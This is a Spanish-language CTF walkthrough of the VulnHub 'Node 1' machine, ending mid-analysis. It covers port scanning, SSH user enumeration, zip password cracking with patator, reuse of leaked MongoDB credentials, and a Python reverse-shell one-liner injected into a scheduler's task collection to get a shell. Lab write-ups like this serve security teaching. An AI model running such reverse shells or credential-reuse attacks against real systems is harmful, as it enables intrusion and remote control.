En este CTF veremos como comprometer el sistema aprovechando errores de programación y de configuración que expondrán datos sensibles, además se reutilizarán credenciales en distintos servicios permitiendo avanzar en nuestro ataque de forma mas sencilla.
Nos bajamos la VM de vulnhub o desde alfaexploit:
https://www.vulnhub.com/entry/node-1,252/
Primero lanzamos un nmap contra el servidor:
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-04 17:03 CEST
Nmap scan report for 192.168.88.1
Host is up (0.00030s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
MAC Address: 08:00:27:52:19:08 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 104.62 seconds
Conectamos manualmente:
X-Powered-By: Express
Debe de tratarse de una app en nodeJS.
Si accedemos mediante un navegador web gráfico http://192.168.88.1:3000/ podemos ver que hay tres usuarios:
- tom
- mark
- rastating
Probemos a conectar mediante ssh utilizando algún usuario:
debug1: Remote protocol version 2.0, remote software version OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
Parece ser una xenial:
openssh (1:7.2p2-4ubuntu2.2) xenial
Podemos comprobar la existencia de usuarios del sistema gracias a un bug que afecta a esa versión de ssh:

Haciendo login en la web podemos bajarnos un fichero de backups:
myplace.backup
Lo guardamos decodificado y miramos de que se trata:
file decoded
decoded: Zip archive data, at least v1.0 to extract
Intentamos descomprimirlo pero pide password:
unzip decoded.zip
Archive: decoded.zip
creating: var/www/myplace/
[decoded.zip] var/www/myplace/package-lock.json password:
Ninguno de los 3 passes que hemos encontrado en Inet funciona.
Intentamos reventarlo con patator mi cracker de zips favorito:
cd patator
screen -S patator
python patator.py unzip_pass zipfile=/home/kr0m/decoded.zip password=FILE0 0=/home/kr0m/rockyou.txt -x ignore:code!=0

Tenemos el backup descomprimido.

Podemos ver el código de Matrix :)
Encontramos partes de código interesantes como la conexión a Mongo:
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
Como se genera el backup:
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
spawn('/usr/local/bin/backup', -q', backup_key, __dirname ]);
Conseguimos acceso por ssh reutilizando las credenciales de mongo para el user mark:
5AYRft73VtFpc84k
uid=1001(mark) gid=1001(mark) groups=1001(mark)
Hay otro proceso de node:
tom 1176 0.0 4.2 1009080 31908 ? Ssl Sep04 0:20 /usr/bin/node /var/scheduler/app.js
Veamos de que se trata:
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
return;
}
setInterval(function () {
db.collection('tasks').find().toArray(function (error, docs) {
if (!error && docs) {
docs.forEach(function (doc) {
if (doc) {
console.log('Executing task ' + doc._id + '...');
exec(doc.cmd);
db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
}
});
}
else if (error) {
console.log('Something went wrong: ' + error);
}
});
}, 30000);
});
Ejecuta tareas que hay en la DB.
DB: scheduler
Colección: tasks
Conectamos manualmente e insertamos una tarea a ejecutar:
> db.tasks.find()
> db.tasks.insert( { cmd: "touch /tmp/AAA" } )
WriteResult({ "nInserted" : 1 })
-rw-r--r-- 1 tom tom 0 Sep 7 11:15 AAA
Ahora probemos con algo mas interesante, una RS:
> db.tasks.insert( { cmd: "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.88.2\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" } )
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
{ "_id" : ObjectId("5b9251e5f9b182ed0c90dfde"), "cmd" : "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.88.2\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" }
Obtenemos shell con el usuario tom:
id
$ uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1002(admin)
$ cat user.txt

Nos centramos en el script de backup:
/usr/local/bin/backup: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=343cf2d93fb2905848a42007439494a2b4984369, not stripped
-rwsr-xr-- 1 root admin 16484 Sep 3 2017 /usr/local/bin/backup
Tiene el setuid bit habilitado!
Si analizamos como se hacen los backups:
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
var proc = spawn('/usr/local/bin/backup', -q', backup_key, __dirname ]);
Se le indica el dir a backupear…
